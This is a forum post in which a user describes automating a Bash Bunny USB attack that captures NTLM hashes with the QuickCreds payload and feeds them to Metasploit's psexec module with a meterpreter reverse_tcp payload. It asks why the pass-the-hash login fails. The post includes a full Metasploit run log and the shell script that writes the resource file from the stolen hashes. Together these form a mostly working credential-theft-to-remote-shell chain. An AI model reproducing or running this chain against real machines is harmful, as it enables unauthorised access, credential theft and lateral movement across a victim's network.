Jump to content
Maestropastelero

msfconsole psexec and BB

Recommended Posts

This is not a 100% BashBunny topic, but it is related and I think all the newbies like me could be interested.

I 've used Metasploit in a Kali laptop with a post mimikatz module loaded and dump  NTLMv2 hashes fine. Takes a Superuser account hash, and use  exploit/windows/smb/psexec for accessing other computers on the same network.

Then I realize I can setup msf on my BB.

Running V1.3 on my BB, I setup Metasploit following this guide :

https://steemit.com/technology/@cronetos/install-metasploit-framework-on-the-bash-bunny-or-other-debian-related-distros

First, it melt my brain as it didn't work and I am not super skilled on this matters, but after some Gems uninstall/install/downgrade I finally make it works.

Then I used the  quickcreds payload for getting the hashes through the USB and when that is done, I build a RC file that it pass to the msfconsole -r.

So far so good.

Metasploit takes like 1 minute to load, but it works. The problem is when it try to exploit it, I always get Login Error : execution expired

The main question is: are the hashes on hashdump  somehow different than the hashes that quickcreds provides? (I hope that don't sounds too newbie)

Or anyone see anything bad on what I am doing here?

 

This is the log I got from metasploit :

       =[ metasploit v4.15.7-dev-70a82b5                  ]
+ -- --=[ 1674 exploits - 960 auxiliary - 295 post        ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/udisk/loot/quickcreds/LAPTOP1/conf.txt for ERB directives.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> use exploit/windows/smb/psexec
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LHOST 172.16.64.1
LHOST => 172.16.64.1
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set LPORT 443
LPORT => 443
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set RHOST 172.16.64.10
RHOST => 172.16.64.10
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBUser myusername
SMBUser => myusername
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBPass df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
SMBPass => df201f7e84ef06aa:7C3A900BB41C05C66F3BE717CF1F8FCB
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> set SMBDomain OFFICEDOMAIN
SMBDomain => OFFICEDOMAIN
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> exploit -j
[*] Exploit running as background job.
resource (/root/udisk/loot/quickcreds/LAPTOP1/conf.txt)> sleep 20
[*] Started reverse TCP handler on 172.16.64.1:443
[*] 172.16.64.10:445 - Connecting to the server...
[*] 172.16.64.10:445 - Authenticating to 172.16.64.10:445|OFFICEDOMAIN as user 'myusername'...
[-] 172.16.64.10:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

---------------------------------------------------------------------------------------------------

This is what I added to the payload to test it (ugly code, it is just a test):


echo "use exploit/windows/smb/psexec" > $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set payload windows/meterpreter/reverse_tcp" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LHOST 172.16.64.1" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set LPORT 443" >> $LOOTDIR/$HOST-$COUNT/conf.txt
echo "set RHOST ${TARGET_IP}" >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBUser "$1}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBPass "$4":"$5}' >> $LOOTDIR/$HOST-$COUNT/conf.txt
head -1 /root/loot/quickcreds/$HOST-$COUNT/*NTLM* |awk -F':' '{print "set SMBDomain "$3}' >> $LOOTDIR/$HOST-$COUNT/conf.txt

echo "exploit -j" >> $LOOTDIR/$HOST-$COUNT/conf.txt
export HOME=/root
source /etc/profile.d/rvm.sh
cd /root/metasploit-framework/
./msfconsole -r $LOOTDIR/$HOST-$COUNT/conf.txt &>> /root/msf.log

 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...